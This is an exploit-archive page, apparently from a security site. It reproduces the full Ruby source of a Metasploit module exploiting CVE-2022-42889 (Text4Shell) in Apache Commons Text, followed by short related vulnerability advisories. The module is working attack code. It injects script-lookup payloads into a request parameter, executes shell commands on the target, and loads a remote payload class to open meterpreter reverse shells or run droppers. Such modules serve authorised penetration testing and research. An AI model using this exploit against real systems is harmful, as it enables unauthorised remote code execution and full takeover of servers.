Headline
Apache Commons Text 1.9 Remote Code Execution
This Metasploit module exploit takes advantage of the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to remote code execution. This is due to a logic flaw that makes the script, dns and url lookup keys interpolated by default, as opposed to what it should be, according to the documentation of the StringLookupFactory class. Those keys allow an attacker to execute arbitrary code via lookups primarily using the script key. In order to exploit the vulnerabilities, the following requirements must be met: Run a version of Apache Commons Text from version 1.5 to 1.9, use the StringSubstitutor interpolator, and the target should run JDK versions prior to 15.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Remote::Java::HTTP::ClassLoader def initialize(info = {}) super( update_info( info, 'Name' => 'Apache Commons Text RCE', 'Description' => %q{ This exploit takes advantage of the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to Remote Code Execution. This is due to a logic flaw that makes the “script”, “dns” and “url” lookup keys interpolated by default, as opposed to what it should be, according to the documentation of the StringLookupFactory class. Those keys allow an attacker to execute arbitrary code via lookups primarily using the "script" key. In order to exploit the vulnerabilities, the following requirements must be met: Run a version of Apache Commons Text from version 1.5 to 1.9 Use the StringSubstitutor interpolator Target should run JDK < 15 }, 'License' => MSF_LICENSE, 'Author' => [ 'Alvaro Muñoz', # Original research 'Karthik UJ', # PoC 'Gaurav Jain', # Metasploit module ], 'References' => [ ['CVE', '2022-42889'], ['URL', 'https://sysdig.com/blog/cve-2022-42889-text4shell/'], ['URL', 'https://github.com/karthikuj/cve-2022-42889-text4shell-docker'] ], 'Platform' => ['win', 'linux', 'unix', 'java'], 'Targets' => [ [ 'Java (in-memory)', { 'Type' => :java, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'DefaultOptions' => { 'Payload' => 'java/meterpreter/reverse_tcp' } }, ], [ 'Windows EXE Dropper', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper, 'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' } } ], [ 'Windows Command', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Type' => :windows_cmd, 'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' } } ], [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_jjs' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } } ] ], 'Privileged' => false, 'DisclosureDate' => '2022-10-13', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_options([ OptString.new('TARGETURI', [ true, 'The target URI', '/']), OptString.new('PARAM', [ true, 'The vulnerable parameter']), OptEnum.new('METHOD', [ true, 'The HTTP method to use', 'GET', ['GET', 'POST']]) ]) end def check vprint_status("Checking if #{peer} can be exploited.") res = send_exp return CheckCode::Unknown('No response received from target.') unless res # blind command injection using sleep command sleep_time = rand(4..8) vprint_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.") _res, elapsed_time = Rex::Stopwatch.elapsed_time do send_exp("java.lang.Thread.sleep(#{sleep_time * 1000})") end vprint_status("Elapsed time: #{elapsed_time.round(2)} seconds.") return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time CheckCode::Vulnerable('Successfully tested command injection.') end def exploit case target['Type'] when :java # Start the HTTP server to serve the payload start_service # Trigger a loadClass request via java.net.URLClassLoader trigger_urlclassloader # Handle the payload handler when :windows_cmd, :unix_cmd execute_command(payload.encoded) when :windows_dropper, :linux_dropper execute_cmdstager end end def trigger_urlclassloader url = get_uri vars = Rex::RandomIdentifier::Generator.new exp = "var #{vars[:str_arr]} = Java.type('java.lang.String[]');" exp << "var #{vars[:obj]} = new java.net.URLClassLoader([new java.net.URL(new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(url)}')))]).loadClass('metasploit.Payload');" exp << "#{vars[:obj]}.getMethod('main', java.lang.Class.forName('[Ljava.lang.String;')).invoke(null, [new #{vars[:str_arr]}(1)]);" res = send_exp(exp) fail_with(Failure::Unreachable, 'No response received from the target') unless res fail_with(Failure::Unknown, 'An unknown error occurred') unless res.code == 200 end def execute_command(cmd, _opts = {}) vars = Rex::RandomIdentifier::Generator.new exp = "var #{vars[:arr]} = [#{win_target? ? '"cmd.exe", "/c"' : '"/bin/sh", "-c"'}, new java.lang.String(java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\"))];" exp << "java.lang.Runtime.getRuntime().exec(#{vars[:arr]});" res = send_exp(exp) fail_with(Failure::Unreachable, 'No response received from the target') unless res fail_with(Failure::Unknown, 'An unknown error occurred') unless res.code == 200 end def send_exp(exp = '') vars = datastore['METHOD'] == 'GET' ? 'vars_get' : 'vars_post' send_request_cgi( 'method' => datastore['METHOD'], 'uri' => normalize_uri(target_uri.path), vars => { datastore['PARAM'] => "${script:javascript:#{exp}}" } ) end def win_target? target['Platform'] == 'win' end def on_request_uri(cli, request) case target['Type'] when :java # Call method to handle java payload staging super(cli, request) else # Handle win/unix cmd staging client = cli.peerhost print_status("Client #{client} requested #{request.uri}") print_status("Sending payload to #{client}") send_response(cli, exe) end endendRelated news
Red Hat Security Advisory 2024-3527-03 - Red Hat AMQ Streams 2.7.0 is now available from the Red Hat Customer Portal. Issues addressed include buffer overflow, denial of service, integer overflow, memory leak, and resource exhaustion vulnerabilities.
Missing HTTP headers (X-Frame-Options, Content-Security-Policy) in KNIME Business Hub before 1.4.0 has left users vulnerable to click jacking. Clickjacking is an attack that occurs when an attacker uses a transparent iframe in a window to trick a user into clicking on an actionable item, such as a button or link, to another server in which they have an identical webpage. The attacker essentially hijacks the user activity intended for the original server and sends them to the other server.
The Web Frontend of KNIME Business Hub before 1.4.0 allows an unauthenticated remote attacker to access internals about the application such as versions, host names, or IP addresses. No personal information or application data was exposed.
Sensitive information exposure in the Web Frontend of KNIME Business Hub until 1.X allows an unauthenticated attacker to extract information about the system. By making a request to a non-existent URL the system will sensitive information to the caller such as internal IP addresses, hostnames, Istio metadata, internal file paths and more. The problem is fixed in KNIME Business Hub 1.xxx. There is no workaround for previous versions.
Red Hat OpenShift Container Platform release 4.10.58 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.10. Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42889: A flaw was found in Apache Commons Text packages 1.5 through 1.9. The affected versions allow an attacker to benefit from a variable interpolation process contained in Apache Common...
OX App Suite before 7.10.6-rev20 allows XSS via upsell ads.
Red Hat Security Advisory 2023-0261-02 - Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. It performs provisioning and configuration management of predefined standard operating environments.
Red Hat Security Advisory 2022-8902-01 - This release of Camel for Spring Boot 3.18.3 serves as a replacement for Camel for Spring Boot 3.14.2 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References. Issues addressed include a denial of service vulnerability.
A minor version update (from 3.14.5 to 3.18.3) is now available for Camel for Spring Boot. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-25897: sdk-server: Denial of Service * CVE-2022-31684: reactor-netty-http: Log request headers in some cases of invalid HTTP requests * CVE-2022-42889: apache-commons-text: variable interpolation RCE
A directory traversal vulnerability in the ZIP archive extraction routines of KNIME Analytics Platform 3.2.0 and above can result in arbitrary files being overwritten on the user's system. This vulnerability is also known as 'Zip-Slip'. An attacker can create a KNIME workflow that, when being opened by a user, can overwrite arbitrary files that the user has write access to. It's not necessary to execute the workflow, opening the workflow is sufficient. The user will notice that something is wrong because an error is being reported but only after the files have already been written. This can impact data integrity (file contents are changed) or cause errors in other software (vital files being corrupted). It can even lead to remote code execution if executable files are being replaced and subsequently executed by the user. In all cases the attacker has to know the location of files on the user's system, though.
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolator...